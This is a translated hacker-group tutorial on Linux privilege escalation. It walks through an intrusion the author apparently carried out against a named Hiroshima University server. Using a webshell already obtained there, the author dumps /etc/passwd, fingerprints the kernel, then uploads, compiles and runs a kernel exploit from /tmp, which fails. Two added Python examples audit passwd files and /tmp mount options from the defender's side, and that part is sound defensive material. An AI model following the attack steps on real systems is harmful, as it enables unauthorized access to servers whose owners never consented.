Some people have always thought that privilege escalation on Linux is an advanced technique. In fact, there is nothing mysterious about it. Summed up, the process comes down to five steps:
1. Obtain a webshell.
2. Confirm that you can execute commands from it, and obtain the Linux system version.
3. Upload the privilege escalation exploit matching that system version to a directory that is writable and executable.
4. Run the privilege escalation program and the reverse-connection script.
5. Control the machine remotely from the command line.
Author: YoCo Smart
From: Silic Group Hacker Army
Http://blackbap.org
The example in this article is again the server of the Hiroshima University institute, and so far I have not obtained root on it. Although it is not a successful example, the purpose of this article is to explain the process rather than the result.
The server setup of the Hiroshima University institute website is:
CentOS + PHP + Apache + PostgreSQL
Of course, this is not important. I have obtained a webshell and found that the exec and system functions are permitted.
First, read the password file: cat /etc/passwd
It returns:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
messages:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ope:x:500:500::/home/ope:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
Apart from root, the accounts with a bash shell are:
the database account on line 32: postgres
the administrator's account on line 36: ope
Apache has a nologin shell. This doesn't seem to affect anything; it is just worth noting.
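The walk through /etc/passwd above is done by eye. The following is an added example, not code from the original post, that does the same audit mechanically: it lists every account that gets an interactive shell, flags any account besides root carrying UID 0, and reports lines that do not have the seven passwd fields. The sample data is constructed for the example (it mirrors the shape of the listing above but adds deliberately bad entries) and is not the server's real file.

```python
# Added example: audit passwd-format text for accounts that can log in
# interactively, duplicate UID 0 entries and malformed lines.

NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin",
                  "/bin/false", "/usr/bin/false", ""}


def parse_passwd(text):
    """Parse passwd-format text into a list of dicts.

    Each well-formed line yields name/uid/gid/gecos/home/shell; a line with the
    wrong field count or a non-numeric UID/GID is kept as a 'malformed' record
    so the auditor sees it instead of silently losing it.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "name": fields[0], "malformed": True})
            continue
        name, _pw, uid, gid, gecos, home, shell = fields
        try:
            uid_i, gid_i = int(uid), int(gid)
        except ValueError:
            entries.append({"line": lineno, "name": name, "malformed": True})
            continue
        entries.append({"line": lineno, "name": name, "uid": uid_i, "gid": gid_i,
                        "gecos": gecos, "home": home, "shell": shell,
                        "malformed": False})
    return entries


def interactive_accounts(entries):
    """(line, name, shell) for every account whose shell is not a known no-login shell."""
    return [(e["line"], e["name"], e["shell"]) for e in entries
            if not e["malformed"] and e["shell"] not in NOLOGIN_SHELLS]


def uid0_accounts(entries):
    """Names of all UID 0 accounts; anything other than 'root' here deserves a look."""
    return [e["name"] for e in entries if not e["malformed"] and e["uid"] == 0]


def malformed_lines(entries):
    """Line numbers of entries that could not be parsed as seven proper fields."""
    return [e["line"] for e in entries if e["malformed"]]


# Constructed sample: a few entries shaped like the listing in the post plus
# a second UID 0 account, a non-numeric UID and a six-field line to exercise
# the checks. Not taken from any real server.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ope:x:500:500::/home/ope:/bin/bash
dup0:x:0:0:constructed duplicate UID 0 entry:/root:/bin/bash
broken:x:abc:abc:constructed non-numeric uid::/bin/sh
short:x:1000:1000:/home/short:/bin/bash
"""

if __name__ == "__main__":
    ents = parse_passwd(SAMPLE_PASSWD)
    for line, name, shell in interactive_accounts(ents):
        print(f"line {line}: {name} -> {shell}")
    print("UID 0 accounts:", uid0_accounts(ents))
    print("malformed lines:", malformed_lines(ents))
```

Run against a real file with `parse_passwd(open("/etc/passwd").read())`. A shell that is absent from NOLOGIN_SHELLS but also not listed in /etc/shells is still worth checking by hand; the set above only covers the conventional no-login shells.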
By the way, the logged-in user listing shows:
10:45:41 up 71 days, 1 user, load average: 2.00, 2.00, 2.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
ope      tty1     -                 26Jan11  71days 0.03s  0.03s -bash
Enough looking around. Let's get to work.
Run the command: uname -a
Echo:
Linux XXXXXXXX.hiroshima-u.ac.jp 2.6.18-164.15.1.el5PAE #1 SMP Wed Mar 17 12:14:29 EDT 2010 i686 i686 i386 GNU/Linux
The kernel is 2.6.18. Next, look at lsb_release -a.
Echo:
LSB Version: core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID: CentOS
Description: CentOS release 5.4 (Final)
Release: 5.4
Codename: Final
So the system is CentOS 5.4, and it is indeed running a 2.6.18 kernel. However, I have not found a vulnerability for this Red Hat system yet.
Upload a privilege escalation script for 2.6.18 from last year to the /tmp directory.
Note: privilege escalation scripts are generally put in /tmp. The reason is simple: the directory is writable and executable. File name: 2618.c
Before escalating, note that this is a C file and cannot be run directly the way an rb or pl script can. It has to be compiled first: gcc -o /tmp/2618 /tmp/2618.c
This compiles /tmp/2618.c into the executable file /tmp/2618.
Now the file can be executed directly: /tmp/2618
Of course, the echo shows that it failed. What came back is the output of Ksplice's diagnostic tool for CVE-2010-3081, which only reports whether the published exploit's in-memory backdoor is present:
Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.
(See http://www.ksplice.com/uptrack/cve-2010-3081)
$ Kernel release: 2.6.18-164.15.1.el5PAE
$ Backdoor in LSM (1/3): checking... not present.
$ Backdoor in timer_list_fops (2/3): not available.
$ Backdoor in IDT (3/3): checking... not present.
Your system is free from the backdoors that would be left in memory
by the published exploit for CVE-2010-3081.
Of course, going straight for a kernel exploit on a kernel shipped by Red Hat is not wise, since Red Hat backports fixes without changing the 2.6.18 base version number. My idea is to find vulnerable software or drivers on the system and use those to escalate. Unfortunately, I haven't succeeded yet.
Conclusion: there are two points to note about privilege escalation scripts. First, if the gcc command cannot compile the script, the problem may be in the C source itself. Second, if gcc on the system cannot produce an executable, the script can be compiled locally or elsewhere and the executable transferred to the target and run directly.
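The whole compile-and-run step above depends on /tmp being both writable and executable, and the conclusion notes that a missing compiler only moves the compile step elsewhere. The following is an added example, not code from the original post, that checks the mount-side half of that from the defender's seat: it parses /proc/mounts-format text, finds the mount that actually governs a given path (longest prefix match), and reports which of noexec, nosuid and nodev are missing. The sample mount table is constructed for the example and is not from the server in the post.

```python
# Added example: report which hardening mount options are missing on the
# mount that governs a world-writable scratch directory such as /tmp.

HARDENING_OPTS = ("noexec", "nosuid", "nodev")


def parse_mounts(text):
    """Return {mountpoint: set(options)} from /proc/mounts-style lines.

    Fields per line: device mountpoint fstype options dump pass.
    /proc/mounts escapes a space in a path as \\040, which is decoded here.
    """
    mounts = {}
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) < 4:
            continue
        mountpoint = parts[1].replace("\\040", " ")
        mounts[mountpoint] = set(parts[3].split(","))
    return mounts


def effective_mount(mounts, path):
    """Mountpoint whose options apply to `path`: the longest mountpoint that is
    a prefix of it, with "/" as the fallback."""
    best = None
    for mp in mounts:
        if mp == "/" or path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best):
                best = mp
    return best


def missing_hardening(text, path):
    """List of HARDENING_OPTS absent on the mount governing `path`,
    or None if no mount covers it (no "/" entry in the table)."""
    mounts = parse_mounts(text)
    mp = effective_mount(mounts, path)
    if mp is None:
        return None
    return [opt for opt in HARDENING_OPTS if opt not in mounts[mp]]


def report(text, paths):
    """{path: missing options} for each scratch directory of interest."""
    return {p: missing_hardening(text, p) for p in paths}


# Constructed sample mount table: /tmp is its own filesystem but lacks noexec,
# /dev/shm is fully hardened, /var/tmp inherits the bare options of /var.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw,relatime,data=ordered 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda3 /tmp ext3 rw,nosuid,nodev,relatime 0 0
/dev/sda2 /var ext3 rw,relatime 0 0
"""

if __name__ == "__main__":
    for path, missing in report(SAMPLE_MOUNTS, ["/tmp", "/var/tmp", "/dev/shm"]).items():
        print(f"{path}: missing {missing or 'nothing'}")
```

On a live host, feed it `open("/proc/mounts").read()`. Keep in mind that noexec only blocks the compiled-binary path the post uses; an interpreter-run rb or pl script, which the text mentions needs no compilation, is not stopped by it, so the mount option is a layer alongside patching the kernel and not a substitute for it.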